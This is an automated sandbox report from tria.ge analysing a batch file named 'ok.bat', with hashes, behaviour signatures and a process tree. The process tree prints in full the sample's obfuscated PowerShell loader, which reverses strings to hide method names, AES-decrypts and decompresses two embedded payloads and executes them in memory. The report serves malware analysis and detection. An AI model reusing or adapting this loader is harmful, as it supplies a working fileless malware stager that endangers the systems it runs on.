Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
18s -
max time network
16s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
02/09/2024, 09:24
Static task
static1
Behavioral task
behavioral1
Sample
ok.bat
Resource
win7-20240708-en
3 signatures
150 seconds
Behavioral task
behavioral2
Sample
ok.bat
Resource
win10v2004-20240802-en
16 signatures
150 seconds
General
-
Target
ok.bat
-
Size
408KB
-
MD5
b0f8f1efd13e7bd0cc66d64eb3d75a63
-
SHA1
1800d9fad1506bbaedf09da136b6334660fa31ab
-
SHA256
0aeb0fb66dd52c44d48137d6b5bbbef9bc57d01c3da4655665e541fdeda94158
-
SHA512
ef1ab4604783c6a58f7adfe0155226e69cb8970f8eaea211432f95c461bdf0aeccc2de677f687e943400dab05bc798b261d8ac5f58442bcac382096757e7d69f
-
SSDEEP
6144:bexdO5Cg9W3uNG0mS4jW5RBgYL9rJ4lwhCFPJt7Reg7lrjqV0KEmtlJ8xePlwGB2:iUCg9XNGxzy5RWnHv7N7B2EMbdwLjqeN
Score
1/10
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 1708 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 2432 wrote to memory of 2156 2432 cmd.exe 31 PID 2432 wrote to memory of 2156 2432 cmd.exe 31 PID 2432 wrote to memory of 2156 2432 cmd.exe 31 PID 2432 wrote to memory of 1708 2432 cmd.exe 32 PID 2432 wrote to memory of 1708 2432 cmd.exe 32 PID 2432 wrote to memory of 1708 2432 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\ok.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2432 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1HvwTOfe16KE/Oo1VmVeLyRX5eszT05lMFFAv86FK2M='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iyFMMVCpvdKRQhPXVaNuEg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $DelDl=New-Object System.IO.MemoryStream(,$param_var); $iauBN=New-Object System.IO.MemoryStream; $WMepm=New-Object System.IO.Compression.GZipStream($DelDl, [IO.Compression.CompressionMode]::Decompress); $WMepm.CopyTo($iauBN); $WMepm.Dispose(); $DelDl.Dispose(); $iauBN.Dispose(); $iauBN.ToArray();}function execute_function($param_var,$param2_var){ $mjGIW=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ujopB=$mjGIW.EntryPoint; $ujopB.Invoke($null, $param2_var);}$YUshL = 'C:\Users\Admin\AppData\Local\Temp\ok.bat';$host.UI.RawUI.WindowTitle = $YUshL;$RMXmR=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($YUshL).Split([Environment]::NewLine);foreach ($hdLAq in $RMXmR) { if ($hdLAq.StartsWith('npMFpQCGBAsoiliwarmL')) { $iDGWH=$hdLAq.Substring(20); break; }}$payloads_var=[string[]]$iDGWH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "2⤵PID:2156
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708
-